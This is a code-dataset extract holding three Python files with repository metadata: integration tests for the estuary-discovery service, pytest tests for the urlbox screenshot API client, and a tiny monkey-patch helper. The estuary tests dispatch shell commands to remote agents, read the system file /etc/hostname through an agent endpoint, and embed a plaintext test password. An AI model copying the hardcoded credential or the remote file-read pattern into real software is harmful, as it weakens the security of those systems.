| 0
| 0
| 0
| 0
|
0
| 8
|
3f6b516f9834601b876a15a850ca889355b27cd6
| 14,468
|
py
|
Python
|
tests/rest_eureka/flask_rest_test.py
|
estuaryoss/estuary-discovery
|
9615a9d544670570f14f4c72ca20f57a0cd9bba4
|
[
"Apache-2.0"
] | null | null | null |
tests/rest_eureka/flask_rest_test.py
|
estuaryoss/estuary-discovery
|
9615a9d544670570f14f4c72ca20f57a0cd9bba4
|
[
"Apache-2.0"
] | null | null | null |
tests/rest_eureka/flask_rest_test.py
|
estuaryoss/estuary-discovery
|
9615a9d544670570f14f4c72ca20f57a0cd9bba4
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
import time
import unittest
import requests
from py_eureka_client import eureka_client
from requests_toolbelt.utils import dump
from rest.api.constants.api_constants import ApiCode
from rest.api.responsehelpers.error_codes import ErrorMessage
class EstuaryStackApps:
@staticmethod
def get_supported_apps():
return ["estuary-agent", "estuary-discovery"]
class EurekaClient:
def __init__(self, host):
self.host = host
def get_apps(self):
apps_list = []
print("Getting apps from eureka server {} ... \n".format(self.host))
for app in eureka_client.get_applications(eureka_server=self.host).applications:
for instance in app.up_instances:
# print(instance.app)
apps_list.append(instance.hostName)
return apps_list
class FlaskServerEurekaTestCase(unittest.TestCase):
discovery_ip = "estuary-discovery"
home_url_int = f"http://{discovery_ip}"
home_url = "http://localhost"
agent_ip = "estuary-agent-java"
server_port_ext = "8081"
server_port = "8080" # all have 8080
no_of_agents = 1
no_of_discovery = 1
username = "admin"
password = "estuaryoss123!"
def test_eureka_registration(self):
up_services = EurekaClient("http://localhost:8080/eureka/v2").get_apps()
self.assertEqual(len(up_services), 2)
def test_get_eureka_apps(self):
headers = {"Content-Type": "application/json"}
response = requests.get(f"{self.home_url}:{self.server_port_ext}/eureka/apps", headers=headers,
auth=(self.username, self.password))
body = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(body.get('message'),
ErrorMessage.HTTP_CODE.get(ApiCode.SUCCESS.value))
# self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(len(body.get('description')), 2)
self.assertEqual(len(body.get('description').get(self.discovery_ip)), self.no_of_discovery)
self.assertEqual(len(body.get('description').get(self.agent_ip)), self.no_of_agents)
self.assertEqual(body.get('description').get(self.discovery_ip)[0].get("ipAddr"), self.discovery_ip)
self.assertEqual(body.get('description').get(self.discovery_ip)[0].get("port"), self.server_port)
self.assertEqual(body.get('description').get(self.discovery_ip)[0].get("app"), self.discovery_ip)
self.assertEqual(body.get('description').get(self.discovery_ip)[0].get("homePageUrl"),
f"{self.home_url_int}:{self.server_port}/")
self.assertEqual(body.get('description').get(self.discovery_ip)[0].get("statusPageUrl"),
f"{self.home_url_int}:{self.server_port}/ping")
self.assertEqual(body.get('description').get(self.discovery_ip)[0].get("healthCheckUrl"),
f"{self.home_url_int}:{self.server_port}/ping")
self.assertEqual(body.get('description').get(self.agent_ip)[0].get("port"), self.server_port)
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertIsNotNone(body.get('timestamp'))
def test_get_eureka_apps_agent(self):
headers = {"Content-Type": "application/json"}
response = requests.get(f"{self.home_url}:{self.server_port_ext}/eureka/apps/estuary-agent", headers=headers,
auth=(self.username, self.password))
body = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(body.get('message'),
ErrorMessage.HTTP_CODE.get(ApiCode.SUCCESS.value))
# self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(len(body.get('description')), self.no_of_agents)
self.assertGreaterEqual(len(body.get('description')[0]), 8)
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertIsNotNone(body.get('timestamp'))
def test_get_eureka_apps_discovery(self):
headers = {"Content-Type": "application/json"}
response = requests.get(f"{self.home_url}:{self.server_port_ext}/eureka/apps/discovery", headers=headers,
auth=(self.username, self.password))
body = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(body.get('message'),
ErrorMessage.HTTP_CODE.get(ApiCode.SUCCESS.value))
# self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(len(body.get('description')), self.no_of_discovery)
self.assertGreaterEqual(len(body.get('description')[0]), 8)
self.assertEqual(body.get('description')[0].get("ipAddr"), self.discovery_ip)
self.assertEqual(body.get('description')[0].get("port"), self.server_port)
self.assertEqual(body.get('description')[0].get("app"), self.discovery_ip)
self.assertEqual(body.get('description')[0].get("homePageUrl"),
f"{self.home_url_int}:{self.server_port}/")
self.assertEqual(body.get('description')[0].get("healthCheckUrl"),
f"{self.home_url_int}:{self.server_port}/ping")
self.assertEqual(body.get('description')[0].get("statusPageUrl"),
f"{self.home_url_int}:{self.server_port}/ping")
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertIsNotNone(body.get('timestamp'))
def test_get_eureka_apps_empty_list(self):
app = "whatever"
headers = {}
response = requests.get(f"{self.home_url}:{self.server_port_ext}/eureka/apps/{app}", headers=headers,
auth=(self.username, self.password))
body = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(len(body.get('description')), 0)
# self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertIsNotNone(body.get('timestamp'))
def test_get_finished_commands(self):
headers = {"Content-Type": "application/json"}
response = requests.get(f"{self.home_url}:{self.server_port_ext}/agents/commands/finished", headers=headers,
auth=(self.username, self.password))
body = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(body.get('message'),
ErrorMessage.HTTP_CODE.get(ApiCode.SUCCESS.value))
# self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(len(body.get('description')), 1)
self.assertIsNotNone(body.get('description')[0].get("ip_port"))
self.assertIsNotNone(body.get('description')[0].get("homePageUrl"))
self.assertIsInstance(body.get('description')[0].get('description'), list)
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertIsNotNone(body.get('timestamp'))
def test_get_commands_unauthorized(self):
headers = {}
response = requests.get(f"{self.home_url}:{self.server_port_ext}/agents/commands", headers=headers,
auth=(self.username, "invalidPasswd"))
headers = response.headers
self.assertEqual(response.status_code, 401)
self.assertEqual(len(headers.get('X-Request-ID')), 16)
def test_time_of_x_requests(self):
repetitions = 5
start = time.time()
headers = {}
for _ in range(1, repetitions):
response = requests.get(f"{self.home_url}:{self.server_port_ext}/eureka/apps", headers=headers,
auth=(self.username, self.password))
self.assertEqual(response.status_code, 200)
end = time.time()
print(f"made {repetitions} get eureka apps repetitions in {end - start} s")
def test_get_agents_file_missing_file_path_n(self):
headers = {
"Content-Type": "application/json",
'whatever': '100'
}
response = requests.get(f"{self.home_url}:{self.server_port_ext}/agents/file/read", headers=headers,
auth=(self.username, self.password))
body = response.json()
self.assertEqual(response.status_code, 200)
self.assertIn("Exception",
body.get('description')[0].get('description'))
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertIsNotNone(body.get('timestamp'))
def test_get_agents_file_p(self):
headers = {
'File-Path': '/etc/hostname'
}
response = requests.get(f"{self.home_url}:{self.server_port_ext}/agents/file/read", headers=headers,
auth=(self.username, self.password))
body = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(len(body.get('description')), 1)
self.assertGreater(len(body.get('description')[0]), 8)
def test_get_agents_file_file_not_found(self):
expected = "Exception"
headers = {
'File-Path': '/dummy_path'
}
response = requests.get(f"{self.home_url}:{self.server_port_ext}/agents/file/read", headers=headers,
auth=(self.username, self.password))
body = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(len(body.get('description')), 1)
self.assertIn(expected, body.get('description')[0].get('description'))
def test_agent_command_start_broadcast_p(self):
cmd = "echo 1"
headers = {
"Content-Type": "application/json"
}
response = requests.post(f"{self.home_url}:{self.server_port_ext}/agents/commands",
data=cmd, headers=headers, auth=(self.username, self.password))
body = response.json()
self.assertEqual(response.status_code, 200)
self.assertIsInstance(body.get('description'), list)
self.assertIsInstance(body.get('description')[0].get('description').get('commands').get(cmd), dict)
def test_agent_command_unicast_p(self):
cmd = "echo 1"
# get eureka apps agent
headers = {
"Content-Type": "application/json"
}
response = requests.get(f"{self.home_url}:{self.server_port_ext}/eureka/apps/agent", headers=headers,
auth=(self.username, self.password))
# print(dump.dump_response(response))
body = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(len(body.get('description')), 1)
# send unicast command
agent_apps = body.get('description')
for i, item in enumerate(agent_apps):
headers = {
'IpAddr-Port': '{}:{}'.format(item.get('ipAddr'), item.get('port')),
"Content-Type": "application/json"
}
# send unicast message to the agents with the ip:port
response = requests.post(
f"{self.home_url}:{self.server_port_ext}/agents/commands", data=cmd, headers=headers,
auth=(self.username, self.password))
body = response.json()
print(dump.dump_response(response))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(body.get('description')), 1)
self.assertIsInstance(body.get('description')[0].get('description').get('commands').get(cmd), dict)
def test_agent_command_start_unicast_by_home_page_url(self):
cmd = "echo 1"
# get eureka apps agent
headers = {
"Content-Type": "application/json"
}
response = requests.get(f"{self.home_url}:{self.server_port_ext}/eureka/apps/agent", headers=headers,
auth=(self.username, self.password))
# print(dump.dump_response(response))
body = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(len(body.get('description')), 1)
# send unicast teststart request and check the results
agent_apps = body.get('description')
for i, item in enumerate(agent_apps):
headers = {
'HomePageUrl': item.get('homePageUrl'),
"Content-Type": "application/json"
}
# send unicast message to the agents with the ip:port
response = requests.post(
f"{self.home_url}:{self.server_port_ext}/agents/commands",
data=cmd, headers=headers, auth=(self.username, self.password))
body = response.json()
print(dump.dump_response(response))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(body.get('description')), 1)
self.assertIsInstance(body.get('description')[0].get('description').get('commands').get(cmd), dict)
def test_agent_command_start_unicast_wrong_ip_port(self):
cmd = "echo 1"
# get eureka apps agent
headers = {
"Content-Type": "application/json"
}
response = requests.get(f"{self.home_url}:{self.server_port_ext}/eureka/apps/agent", headers=headers,
auth=(self.username, self.password))
body = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(len(body.get('description')), 1)
# send unicast command
agent_apps = body.get('description')
for i, item in enumerate(agent_apps):
headers = {
'IpAddr-Port': '{}:{}'.format(item.get('ipAddr') + "invalidThing", item.get('port')),
"Content-Type": "application/json"
}
# send unicast message to the agents with the ip:port
response = requests.post(
f"{self.home_url}:{self.server_port_ext}/agents/commands",
data=cmd, headers=headers, auth=(self.username, self.password))
body = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(len(body.get('description')), 0)
if __name__ == '__main__':
unittest.main()
| 46.5209
| 117
| 0.623721
| 1,663
| 14,468
| 5.279014
| 0.101624
| 0.051031
| 0.088165
| 0.070167
| 0.820595
| 0.792004
| 0.772298
| 0.755781
| 0.739378
| 0.739378
| 0
| 0.011239
| 0.237421
| 14,468
| 310
| 118
| 46.670968
| 0.784465
| 0.051769
| 0
| 0.550201
| 0
| 0
| 0.205328
| 0.087299
| 0
| 0
| 0
| 0
| 0.301205
| 1
| 0.072289
| false
| 0.072289
| 0.028112
| 0.004016
| 0.160643
| 0.016064
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
3f6c7bd9dac49bb2e0aaa51aab7049d26d2f2c36
| 21,646
|
py
|
Python
|
tests/test_urlbox_client.py
|
urlbox/urlbox-python
|
8d4541cbe0310002b9bdb70ee8de4cb051f8815d
|
[
"MIT"
] | 2
|
2021-11-26T14:28:29.000Z
|
2021-11-26T17:22:39.000Z
|
tests/test_urlbox_client.py
|
urlbox/urlbox-python
|
8d4541cbe0310002b9bdb70ee8de4cb051f8815d
|
[
"MIT"
] | 10
|
2021-11-26T16:54:34.000Z
|
2021-12-08T19:15:44.000Z
|
tests/test_urlbox_client.py
|
urlbox/urlbox-python
|
8d4541cbe0310002b9bdb70ee8de4cb051f8815d
|
[
"MIT"
] | null | null | null |
from faker import Faker
from hashlib import sha1
from urlbox import InvalidUrlException, UrlboxClient
import json
import hmac
import pytest
import random
import requests
import requests_mock
import urllib.parse
import warnings
fake = Faker()
# test_init()
def test_only_api_key_provided():
api_key = fake.pystr()
urlbox_client = UrlboxClient(api_key=api_key)
assert urlbox_client.api_key == api_key
def test_both_api_key_and_api_secret_provided():
api_key = fake.pystr()
api_secret = fake.pystr()
urlbox_client = UrlboxClient(api_key=api_key, api_secret=api_secret)
assert (
urlbox_client.api_key == api_key
and urlbox_client.api_secret == api_secret
)
def test_api_key_not_provided():
with pytest.raises(TypeError) as type_error:
UrlboxClient()
assert (
str(type_error.value)
== "__init__() missing 1 required keyword-only argument: 'api_key'"
)
# Test get()
# valid api key
# valid url, format and options
def test_get_successful():
api_key = fake.pystr()
format = random.choice(
["png", "jpg", "jpeg", "avif", "webp", "pdf", "svg", "html"]
)
url = fake.url()
options = {
"url": url,
"format": format,
"full_page": random.choice([True, False]),
"width": fake.random_int(),
}
urlbox_request_url = (
f"{UrlboxClient.BASE_API_URL}"
f"{api_key}/{format}"
f"?{urllib.parse.urlencode(options, doseq=True)}"
)
urlbox_client = UrlboxClient(api_key=api_key)
with requests_mock.Mocker() as requests_mocker:
with open(
"tests/files/urlbox_screenshot.png", "rb"
) as urlbox_screenshot:
requests_mocker.get(
urlbox_request_url,
content=urlbox_screenshot.read(),
headers={"content-type": f"image/{format}"},
)
response = urlbox_client.get(options)
assert response.status_code == 200
assert format in response.headers["Content-Type"]
assert isinstance(response, requests.models.Response)
assert isinstance(response.content, bytes)
def test_get_successful_authenticated():
api_key = fake.pystr()
api_secret = fake.pystr()
format = random.choice(
["png", "jpg", "jpeg", "avif", "webp", "pdf", "svg", "html"]
)
url = fake.url()
options = {
"url": url,
"format": format,
"full_page": random.choice([True, False]),
"width": fake.random_int(),
"header": ["header1=value1", "header2=value2"],
}
url_encoded_options = urllib.parse.urlencode(options, doseq=True)
token = (
hmac.new(
str.encode(api_secret), str.encode(url_encoded_options), sha1,
)
.hexdigest()
.rstrip("\n")
)
urlbox_request_url = (
f"{UrlboxClient.BASE_API_URL}"
f"{api_key}/{token}/{format}"
f"?{url_encoded_options}"
)
urlbox_client = UrlboxClient(api_key=api_key, api_secret=api_secret)
with requests_mock.Mocker() as requests_mocker:
with open(
"tests/files/urlbox_screenshot.png", "rb"
) as urlbox_screenshot:
requests_mocker.get(
urlbox_request_url,
content=urlbox_screenshot.read(),
headers={"content-type": f"image/{format}"},
)
response = urlbox_client.get(options)
assert response.status_code == 200
assert format in response.headers["Content-Type"]
assert isinstance(response, requests.models.Response)
assert isinstance(response.content, bytes)
def test_get_with_header_array_in_options():
api_key = fake.pystr()
format = random.choice(
["png", "jpg", "jpeg", "avif", "webp", "pdf", "svg", "html"]
)
url = fake.url()
options = {
"url": url,
"format": format,
"full_page": random.choice([True, False]),
"width": fake.random_int(),
"header": [
"x-my-first-header=somevalue",
"x-my-second-header=someothervalue",
],
}
urlbox_request_url = (
f"{UrlboxClient.BASE_API_URL}"
f"{api_key}/{format}"
f"?{urllib.parse.urlencode(options, doseq=True)}"
)
urlbox_client = UrlboxClient(api_key=api_key)
with requests_mock.Mocker() as requests_mocker:
with open(
"tests/files/urlbox_screenshot.png", "rb"
) as urlbox_screenshot:
requests_mocker.get(
urlbox_request_url,
content=urlbox_screenshot.read(),
headers={"content-type": f"image/{format}"},
)
response = urlbox_client.get(options)
assert response.status_code == 200
assert format in response.headers["Content-Type"]
assert isinstance(response, requests.models.Response)
assert isinstance(response.content, bytes)
assert (
"header=x-my-first-header%3Dsomevalue&header=x-my-second-header%3Dsomeothervalue"
in urlbox_request_url
)
# valid url but with white spaces before and after
def test_get_successful_white_space_url():
api_key = fake.pystr()
format = random.choice(
["png", "jpg", "jpeg", "avif", "webp", "pdf", "svg", "html"]
)
url = fake.url()
url_with_white_spaces = f" {url} "
options = {
"url": url_with_white_spaces,
"format": format,
"full_page": random.choice([True, False]),
"width": fake.random_int(),
}
options_parsed = options.copy()
options_parsed["url"] = url
urlbox_request_url = (
f"{UrlboxClient.BASE_API_URL}"
f"{api_key}/{format}"
f"?{urllib.parse.urlencode(options_parsed, doseq=True)}"
)
urlbox_client = UrlboxClient(api_key=api_key)
with requests_mock.Mocker() as requests_mocker:
with open(
"tests/files/urlbox_screenshot.png", "rb"
) as urlbox_screenshot:
requests_mocker.get(
urlbox_request_url,
content=urlbox_screenshot.read(),
headers={"content-type": f"image/{format}"},
)
response = urlbox_client.get(options)
assert response.status_code == 200
assert format in response.headers["Content-Type"]
assert isinstance(response, requests.models.Response)
assert isinstance(response.content, bytes)
def test_get_successful_without_setting_format():
api_key = fake.pystr()
url = fake.url()
options = {
"url": url,
"full_page": random.choice([True, False]),
"width": fake.random_int(),
}
urlbox_request_url = (
f"{UrlboxClient.BASE_API_URL}"
f"{api_key}/png"
f"?{urllib.parse.urlencode(options, doseq=True)}"
)
urlbox_client = UrlboxClient(api_key=api_key)
with requests_mock.Mocker() as requests_mocker:
with open(
"tests/files/urlbox_screenshot.png", "rb"
) as urlbox_screenshot:
requests_mocker.get(
urlbox_request_url,
content=urlbox_screenshot.read(),
headers={"content-type": f"image/png"},
)
response = urlbox_client.get(options)
assert response.status_code == 200
assert "image/png" in response.headers["Content-Type"]
assert isinstance(response, requests.models.Response)
assert isinstance(response.content, bytes)
def test_get_successful_missing_schema_url():
api_key = fake.pystr()
format = random.choice(
["png", "jpg", "jpeg", "avif", "webp", "pdf", "svg", "html"]
)
url_original = "twitter.com"
url_with_schema = f"http://{url_original}"
options = {
"url": url_original,
"format": format,
"full_page": random.choice([True, False]),
"width": fake.random_int(),
}
options_parsed = options.copy()
options_parsed["url"] = url_with_schema
urlbox_request_url = (
f"{UrlboxClient.BASE_API_URL}"
f"{api_key}/{format}"
f"?{urllib.parse.urlencode(options_parsed, doseq=True)}"
)
urlbox_client = UrlboxClient(api_key=api_key)
with requests_mock.Mocker() as requests_mocker:
with open(
"tests/files/urlbox_screenshot.png", "rb"
) as urlbox_screenshot:
requests_mocker.get(
urlbox_request_url,
content=urlbox_screenshot.read(),
headers={"content-type": f"image/{format}"},
)
response = urlbox_client.get(options)
assert response.status_code == 200
assert format in response.headers["Content-Type"]
assert isinstance(response, requests.models.Response)
assert isinstance(response.content, bytes)
def test_get_invalid_url():
format = random.choice(
["png", "jpg", "jpeg", "avif", "webp", "pdf", "svg", "html"]
)
url = fake.address()
options = {
"url": url,
"format": format,
"full_page": random.choice([True, False]),
"width": fake.random_int(),
}
urlbox_client = UrlboxClient(api_key=fake.pystr())
with pytest.raises(InvalidUrlException) as invalid_url_exception:
urlbox_client.get(options)
assert url in str(invalid_url_exception.value)
def test_get_with_different_host_name():
api_host_name = random.choice(["api-eu.urlbox.io", "api-direct.urlbox.io"])
api_key = fake.pystr()
format = random.choice(
["png", "jpg", "jpeg", "avif", "webp", "pdf", "svg", "html"]
)
url = fake.url()
options = {
"url": url,
"format": format,
"full_page": random.choice([True, False]),
"width": fake.random_int(),
}
urlbox_request_url = (
f"https://{api_host_name}/"
f"{api_key}/{format}"
f"?{urllib.parse.urlencode(options, doseq=True)}"
)
urlbox_client = UrlboxClient(api_key=api_key, api_host_name=api_host_name)
with requests_mock.Mocker() as requests_mocker:
with open(
"tests/files/urlbox_screenshot.png", "rb"
) as urlbox_screenshot:
requests_mocker.get(
urlbox_request_url,
content=urlbox_screenshot.read(),
headers={"content-type": f"image/{format}"},
)
response = urlbox_client.get(options)
assert response.status_code == 200
assert format in response.headers["Content-Type"]
assert isinstance(response, requests.models.Response)
assert isinstance(response.content, bytes)
def test_get_successful_with_html_not_url():
api_key = fake.pystr()
format = random.choice(
["png", "jpg", "jpeg", "avif", "webp", "pdf", "svg", "html"]
)
html = "<html><head></head><body><h1>TEST</h1></body></html>"
options = {"html": html, "format": format}
urlbox_request_url = (
f"{UrlboxClient.BASE_API_URL}"
f"{api_key}/{format}"
f"?{urllib.parse.urlencode(options, doseq=True)}"
)
urlbox_client = UrlboxClient(api_key=api_key)
with requests_mock.Mocker() as requests_mocker:
with open(
"tests/files/urlbox_screenshot.png", "rb"
) as urlbox_screenshot:
requests_mocker.get(
urlbox_request_url,
content=urlbox_screenshot.read(),
headers={"content-type": f"image/{format}"},
)
response = urlbox_client.get(options)
assert response.status_code == 200
assert format in response.headers["Content-Type"]
assert isinstance(response, requests.models.Response)
assert isinstance(response.content, bytes)
def test_get_unsuccessful_without_html_not_url():
api_key = fake.pystr()
format = random.choice(
["png", "jpg", "jpeg", "avif", "webp", "pdf", "svg", "html"]
)
options = {"format": format}
urlbox_request_url = (
f"{UrlboxClient.BASE_API_URL}"
f"{api_key}/{format}"
f"?{urllib.parse.urlencode(options, doseq=True)}"
)
urlbox_client = UrlboxClient(api_key=api_key)
with pytest.raises(KeyError) as missing_key_exception:
urlbox_client.get(options)
assert "Missing 'url' or 'html' key in options" in str(
missing_key_exception.value
)
# DELETE
def test_delete_request():
api_key = fake.pystr()
format = random.choice(
["png", "jpg", "jpeg", "avif", "webp", "pdf", "svg", "html"]
)
url = fake.url()
options = {"url": url, "format": format}
urlbox_request_url = (
f"{UrlboxClient.BASE_API_URL}"
f"{api_key}/{format}"
f"?{urllib.parse.urlencode(options, doseq=True)}"
)
urlbox_client = UrlboxClient(api_key=api_key)
with requests_mock.Mocker() as requests_mocker:
requests_mocker.delete(
urlbox_request_url, headers={"content-type": f"image/{format}"}
)
response = urlbox_client.delete(options)
assert response.status_code == 200
assert format in response.headers["Content-Type"]
assert isinstance(response, requests.models.Response)
# HEAD
def test_head_request():
api_key = fake.pystr()
format = random.choice(
["png", "jpg", "jpeg", "avif", "webp", "pdf", "svg", "html"]
)
url = fake.url()
options = {
"url": url,
"format": format,
"full_page": random.choice([True, False]),
"width": fake.random_int(),
}
urlbox_request_url = (
f"{UrlboxClient.BASE_API_URL}"
f"{api_key}/{format}"
f"?{urllib.parse.urlencode(options, doseq=True)}"
)
urlbox_client = UrlboxClient(api_key=api_key)
with requests_mock.Mocker() as requests_mocker:
requests_mocker.head(
urlbox_request_url,
content=b"",
headers={"content-type": f"image/{format}"},
)
response = urlbox_client.head(options)
assert response.status_code == 200
assert format in response.headers["Content-Type"]
assert isinstance(response, requests.models.Response)
assert isinstance(response.content, bytes)
assert len(response.content) == 0
def test_head_with_different_host_name():
api_host_name = random.choice(["api-eu.urlbox.io", "api-direct.urlbox.io"])
api_key = fake.pystr()
format = random.choice(
["png", "jpg", "jpeg", "avif", "webp", "pdf", "svg", "html"]
)
url = fake.url()
options = {
"url": url,
"format": format,
"full_page": random.choice([True, False]),
"width": fake.random_int(),
}
urlbox_request_url = (
f"https://{api_host_name}/"
f"{api_key}/{format}"
f"?{urllib.parse.urlencode(options, doseq=True)}"
)
urlbox_client = UrlboxClient(api_key=api_key, api_host_name=api_host_name)
with requests_mock.Mocker() as requests_mocker:
requests_mocker.head(
urlbox_request_url,
content=b"",
headers={"content-type": f"image/{format}"},
)
response = urlbox_client.head(options)
assert response.status_code == 200
assert format in response.headers["Content-Type"]
assert isinstance(response, requests.models.Response)
assert isinstance(response.content, bytes)
assert len(response.content) == 0
# POST
def test_post_request_successful():
api_key = fake.pystr()
api_secret = fake.pystr()
format = random.choice(
["png", "jpg", "jpeg", "avif", "webp", "pdf", "svg", "html"]
)
options = {
"url": fake.url(),
"webhook_url": f"{fake.url()}/webook",
"format": format,
"full_page": random.choice([True, False]),
"width": fake.random_int(),
}
urlbox_request_url = (
f"{UrlboxClient.BASE_API_URL}{UrlboxClient.POST_END_POINT}"
)
urlbox_client = UrlboxClient(api_key=api_key, api_secret=api_secret)
with requests_mock.Mocker() as requests_mocker:
requests_mocker.post(
urlbox_request_url,
content=b'{"status":"created","renderId":"47dd4b7b-1eea-437c-ade0-f2d1cd7bf5a1","statusUrl":"https://api.urlbox.io/render/47dd4b7b-1eea-437c-ade0-f2d1cd7bf5a1"}',
headers={"content-type": "application/json"},
status_code=201,
)
response = urlbox_client.post(options)
assert response.status_code == 201
assert isinstance(response, requests.models.Response)
assert isinstance(response.content, bytes)
def test_post_with_different_host_name():
api_host_name = random.choice(["api-eu.urlbox.io", "api-direct.urlbox.io"])
api_key = fake.pystr()
api_secret = fake.pystr()
format = random.choice(
["png", "jpg", "jpeg", "avif", "webp", "pdf", "svg", "html"]
)
url = fake.url()
options = {
"url": fake.url(),
"webhook_url": f"{fake.url()}/webook",
"format": format,
"full_page": random.choice([True, False]),
"width": fake.random_int(),
}
urlbox_request_url = (
f"https://{api_host_name}/{UrlboxClient.POST_END_POINT}"
)
urlbox_client = UrlboxClient(
api_key=api_key, api_secret=api_secret, api_host_name=api_host_name
)
with requests_mock.Mocker() as requests_mocker:
requests_mocker.post(
urlbox_request_url,
content=b'{"status":"created","renderId":"47dd4b7b-1eea-437c-ade0-f2d1cd7bf5a1","statusUrl":"https://api.urlbox.io/render/47dd4b7b-1eea-437c-ade0-f2d1cd7bf5a1"}',
headers={"content-type": "application/json"},
status_code=201,
)
response = urlbox_client.post(options)
assert response.status_code == 201
assert isinstance(response, requests.models.Response)
assert isinstance(response.content, bytes)
def test_post_request_successful_missing_webhook_url():
api_key = fake.pystr()
api_secret = fake.pystr()
format = random.choice(
["png", "jpg", "jpeg", "avif", "webp", "pdf", "svg", "html"]
)
options = {
"url": fake.url(),
"format": format,
"full_page": random.choice([True, False]),
"width": fake.random_int(),
}
urlbox_request_url = (
f"{UrlboxClient.BASE_API_URL}{UrlboxClient.POST_END_POINT}"
)
with requests_mock.Mocker() as requests_mocker:
requests_mocker.post(
urlbox_request_url,
content=b'{"status":"created","renderId":"47dd4b7b-1eea-437c-ade0-f2d1cd7bf5a1","statusUrl":"https://api.urlbox.io/render/47dd4b7b-1eea-437c-ade0-f2d1cd7bf5a1"}',
headers={"content-type": "application/json"},
status_code=201,
)
urlbox_client = UrlboxClient(api_key=api_key, api_secret=api_secret)
with warnings.catch_warnings(record=True) as warning:
response = urlbox_client.post(options)
# Test resoonse
assert response.status_code == 201
assert isinstance(response, requests.models.Response)
assert isinstance(response.content, bytes)
# Test warning
assert len(warning) == 1
assert issubclass(warning[-1].category, UserWarning)
assert (
"webhook_url not supplied, you will need to poll the statusUrl in order to get your result"
in str(warning[-1].message)
)
def test_post_request_unsuccessful_missing_api_secret():
api_key = fake.pystr()
format = random.choice(
["png", "jpg", "jpeg", "avif", "webp", "pdf", "svg", "html"]
)
options = {
"url": fake.url(),
"webhook_url": f"{fake.url()}/webook",
"format": format,
"full_page": random.choice([True, False]),
"width": fake.random_int(),
}
urlbox_client = UrlboxClient(api_key=api_key)
with pytest.raises(Exception) as ex:
urlbox_client.post(options)
assert (
"Missing api_secret when initialising client. Required for authorised post request."
in str(ex.value)
)
# Test generate_url
def test_generate_url_without_api_secret():
api_key = fake.pystr()
format = random.choice(
["png", "jpg", "jpeg", "avif", "webp", "pdf", "svg", "html"]
)
url = fake.url()
options = {
"url": url,
"format": format,
"full_page": random.choice([True, False]),
"width": fake.random_int(),
}
urlbox_client = UrlboxClient(api_key=api_key)
urlbox_url = urlbox_client.generate_url(options)
assert isinstance(urlbox_url, str)
def test_get_successful_as_str_with_api_secret():
api_key = fake.pystr()
api_secret = fake.pystr()
format = random.choice(
["png", "jpg", "jpeg", "avif", "webp", "pdf", "svg", "html"]
)
url = fake.url()
options = {
"url": url,
"format": format,
"full_page": random.choice([True, False]),
"width": fake.random_int(),
}
urlbox_client = UrlboxClient(api_key=api_key, api_secret=api_secret)
urlbox_url = urlbox_client.generate_url(options)
assert isinstance(urlbox_url, str)
# It doesn't leak the api_secret (uses the tokenised options instead)
assert api_secret not in urlbox_url
| 28.746348
| 174
| 0.603299
| 2,458
| 21,646
| 5.097234
| 0.078519
| 0.039269
| 0.02155
| 0.021071
| 0.851943
| 0.834943
| 0.823609
| 0.81882
| 0.816905
| 0.808604
| 0
| 0.009471
| 0.263467
| 21,646
| 752
| 175
| 28.784574
| 0.776391
| 0.011318
| 0
| 0.706406
| 0
| 0.007117
| 0.192678
| 0.059005
| 0
| 0
| 0
| 0
| 0.119217
| 1
| 0.039146
| false
| 0
| 0.019573
| 0
| 0.058719
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
58ad75f3819db67b92a4730a3fc8d56d37119d74
| 41
|
py
|
Python
|
python/monkey_patch/hugahuga.py
|
okimurak/til
|
19b371d39ad57353e29ed409b2288ff8bbc2d1e1
|
[
"MIT"
] | null | null | null |
python/monkey_patch/hugahuga.py
|
okimurak/til
|
19b371d39ad57353e29ed409b2288ff8bbc2d1e1
|
[
"MIT"
] | 1
|
2021-11-12T08:11:43.000Z
|
2021-11-12T08:11:43.000Z
|
python/monkey_patch/hugahuga.py
|
okimurak/til
|
19b371d39ad57353e29ed409b2288ff8bbc2d1e1
|
[
"MIT"
] | null | null | null |
def fuga_function():
return "fugafuga"
| 13.666667
| 20
| 0.731707
| 5
| 41
| 5.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.146341
| 41
| 3
| 21
| 13.666667
| 0.828571
| 0
| 0
| 0
| 0
| 0
| 0.195122
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
